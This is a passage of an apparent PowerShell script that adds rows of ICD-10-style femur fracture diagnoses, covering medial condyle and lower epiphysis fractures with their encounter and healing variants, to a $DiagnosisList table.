$DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right femur","Displaced fracture of medial condyle of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left femur","Displaced fracture of medial condyle of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified femur","Displaced fracture of medial condyle of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right femur","Nondisplaced fracture of medial condyle of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left femur","Nondisplaced fracture of medial condyle of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified femur","Nondisplaced fracture of medial condyle of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of right femur","Displaced fracture of lower epiphysis (separation) of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of left femur","Displaced fracture of lower epiphysis (separation) of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lower epiphysis (separation) of unspecified femur","Displaced fracture of lower epiphysis (separation) of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of right femur","Nondisplaced fracture of lower epiphysis (separation) of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of lower epiphysis (separation) of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lower epiphysis (separation) of left femur","Nondisplaced fracture of 